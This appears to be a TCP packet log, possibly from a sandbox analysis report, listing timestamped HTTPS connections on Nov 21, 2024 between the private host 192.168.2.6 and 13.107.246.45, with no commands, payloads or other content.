                                                                                                                                                                      Nov 21, 2024 06:24:54.843982935 CET4435000013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:54.846488953 CET50000443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:54.846507072 CET4435000013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:54.846818924 CET50000443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:54.846823931 CET4435000013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:54.866070032 CET4434999913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:54.870426893 CET49999443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:54.870493889 CET4434999913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:54.870733976 CET49999443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:54.870747089 CET4434999913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:54.942739010 CET4435000113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:54.946813107 CET50001443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:54.946901083 CET4435000113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:54.947331905 CET50001443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:54.947346926 CET4435000113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:54.975307941 CET4435000213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:54.978360891 CET50002443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:54.978377104 CET4435000213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:54.978549004 CET50002443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:54.978554964 CET4435000213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.137906075 CET4435000313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.138389111 CET50003443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.138443947 CET4435000313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.138822079 CET50003443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.138837099 CET4435000313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.280960083 CET4435000013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.284127951 CET4435000013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.286014080 CET50000443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.286129951 CET50000443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.286129951 CET50000443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.286147118 CET4435000013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.286154985 CET4435000013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.288516045 CET50004443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.288625956 CET4435000413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.288726091 CET50004443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.288954973 CET50004443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.289005995 CET4435000413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.310756922 CET4434999913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.313961983 CET4434999913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.314006090 CET4434999913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.314022064 CET49999443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.314064026 CET49999443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.314091921 CET49999443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.314110994 CET4434999913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.314124107 CET49999443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.314130068 CET4434999913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.316418886 CET50005443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.316498041 CET4435000513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.316572905 CET50005443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.316692114 CET50005443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.316709042 CET4435000513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.406261921 CET4435000113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.409286976 CET4435000113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.409410954 CET4435000113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.409449100 CET50001443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.409506083 CET50001443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.409550905 CET50001443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.409552097 CET50001443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.409595966 CET4435000113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.409626007 CET4435000113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.412264109 CET50006443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.412360907 CET4435000613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.412442923 CET50006443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.412578106 CET50006443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.412601948 CET4435000613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.417386055 CET4435000213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.420572996 CET4435000213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.420640945 CET50002443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.420681000 CET50002443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.420681000 CET50002443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.420694113 CET4435000213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.420701981 CET4435000213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.422687054 CET50007443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.422744989 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.422827005 CET50007443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.422969103 CET50007443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.423000097 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.591334105 CET4435000313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.594547987 CET4435000313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.594630003 CET50003443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.594700098 CET50003443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.594700098 CET50003443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.594738960 CET4435000313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.594760895 CET4435000313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.597275972 CET50008443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.597359896 CET4435000813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:55.597968102 CET50008443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.598094940 CET50008443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:55.598120928 CET4435000813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:56.947134018 CET4435000413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:56.947556019 CET50004443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:56.947594881 CET4435000413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:56.947959900 CET50004443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:56.947972059 CET4435000413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.195406914 CET4435000613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.196043968 CET50006443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.196093082 CET4435000613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.196515083 CET50006443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.196527958 CET4435000613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.202229977 CET4435000513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.202589035 CET50005443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.202656984 CET4435000513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.202917099 CET50005443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.202929974 CET4435000513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.207238913 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.207483053 CET50007443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.207500935 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.207786083 CET50007443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.207798958 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.376820087 CET4435000813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.377382040 CET50008443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.377445936 CET4435000813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.377718925 CET50008443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.377737999 CET4435000813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.400836945 CET4435000413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.403681040 CET4435000413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.405987024 CET50004443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.407099962 CET50004443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.407149076 CET4435000413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.407180071 CET50004443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.407196999 CET4435000413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.409926891 CET50009443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.409970045 CET4435000913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.410084009 CET50009443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.410291910 CET50009443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.410303116 CET4435000913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.643493891 CET4435000613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.683098078 CET4435000613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.683199883 CET50006443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.683304071 CET50006443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.683304071 CET50006443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.683362961 CET4435000613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.683388948 CET4435000613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.685857058 CET50010443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.685920000 CET4435001013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.686002016 CET50010443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.686171055 CET50010443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.686192036 CET4435001013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.759649992 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.759733915 CET4435000513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.759737968 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.759758949 CET4435000513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.759845018 CET50007443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.759875059 CET4435000513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.759897947 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.759932041 CET50005443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.759949923 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.759963989 CET50005443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.760138988 CET50007443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.760179043 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.760202885 CET50007443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.760202885 CET50007443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.760224104 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.760243893 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.767193079 CET50005443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.767193079 CET50005443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.767211914 CET4435000513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.767231941 CET4435000513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.770179987 CET50011443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.770216942 CET4435001113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.770302057 CET50012443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.770354986 CET50011443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.770375967 CET4435001213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.770448923 CET50012443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.770523071 CET50011443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.770534039 CET4435001113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.770601988 CET50012443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.770634890 CET4435001213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.846348047 CET4435000813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.849409103 CET4435000813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.849504948 CET50008443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.849626064 CET50008443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.849626064 CET50008443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.849673986 CET4435000813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.849704027 CET4435000813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.852075100 CET50013443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.852109909 CET4435001313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:57.852176905 CET50013443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.852305889 CET50013443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:57.852309942 CET4435001313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.297651052 CET4435000913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.298199892 CET50009443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:59.298219919 CET4435000913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.298648119 CET50009443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:59.298654079 CET4435000913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.488893986 CET4435001113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.489506960 CET50011443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:59.489533901 CET4435001113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.489981890 CET50011443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:59.489986897 CET4435001113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.538655996 CET4435001013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.539477110 CET50010443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:59.539505005 CET4435001013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.539809942 CET50010443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:59.539819002 CET4435001013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.549146891 CET4435001213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.549455881 CET50012443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:59.549509048 CET4435001213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.549794912 CET50012443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:59.549808025 CET4435001213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.636898994 CET4435001313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.637331009 CET50013443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:59.637356997 CET4435001313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.637813091 CET50013443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:59.637819052 CET4435001313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.741821051 CET4435000913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.750303984 CET4435000913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.750354052 CET4435000913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.750396013 CET50009443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:59.750436068 CET50009443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:59.750497103 CET50009443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:59.750509977 CET4435000913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.750520945 CET50009443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:59.750525951 CET4435000913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.753324986 CET50014443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:59.753407001 CET4435001413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.753508091 CET50014443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:59.753648043 CET50014443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:59.753681898 CET4435001413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.943744898 CET4435001113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.946865082 CET4435001113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.947031021 CET50011443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:59.947031975 CET50011443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:59.947031975 CET50011443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:59.949539900 CET50015443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:59.949577093 CET4435001513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.949634075 CET50015443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:59.949791908 CET50015443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:59.949804068 CET4435001513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.991780996 CET4435001013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.991957903 CET4435001013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.992034912 CET50010443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:59.992362022 CET50010443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:59.992362022 CET50010443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:59.992403030 CET4435001013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.992430925 CET4435001013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.995117903 CET50016443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:59.995142937 CET4435001613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:59.995279074 CET50016443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:59.995455027 CET50016443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:59.995471954 CET4435001613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:00.000307083 CET4435001213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:00.003473997 CET4435001213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:00.003542900 CET50012443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:00.003580093 CET50012443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:00.003580093 CET50012443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:00.003599882 CET4435001213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:00.003611088 CET4435001213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:00.005646944 CET50017443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:00.005696058 CET4435001713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:00.005769014 CET50017443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:00.005903006 CET50017443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:00.005930901 CET4435001713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:00.080322981 CET4435001313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:00.083338976 CET4435001313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:00.083448887 CET4435001313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:00.083508968 CET50013443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:00.083579063 CET50013443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:00.083579063 CET50013443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:00.083597898 CET50013443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:00.083610058 CET4435001313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:00.086289883 CET50018443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:00.086323977 CET4435001813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:00.086409092 CET50018443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:00.086544991 CET50018443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:00.086556911 CET4435001813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:00.166249037 CET50011443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:00.166279078 CET4435001113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:01.532186985 CET4435001413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:01.532761097 CET50014443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:01.532788992 CET4435001413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:01.533283949 CET50014443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:01.533296108 CET4435001413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:01.666395903 CET4435001513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:01.666862965 CET50015443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:01.666877985 CET4435001513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:01.667304993 CET50015443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:01.667309046 CET4435001513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:01.725898981 CET4435001713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:01.726485968 CET50017443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:01.726555109 CET4435001713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:01.727021933 CET50017443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:01.727039099 CET4435001713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:01.782432079 CET4435001613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:01.783082008 CET50016443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:01.783099890 CET4435001613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:01.783449888 CET50016443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:01.783458948 CET4435001613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:01.871980906 CET4435001813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:01.876688957 CET50018443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:01.876705885 CET4435001813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:01.877269983 CET50018443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:25:01.877274990 CET4435001813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:01.991059065 CET4435001413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:01.994199991 CET4435001413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:25:01.994365931 CET50014443192.168.2.613.107.246.45
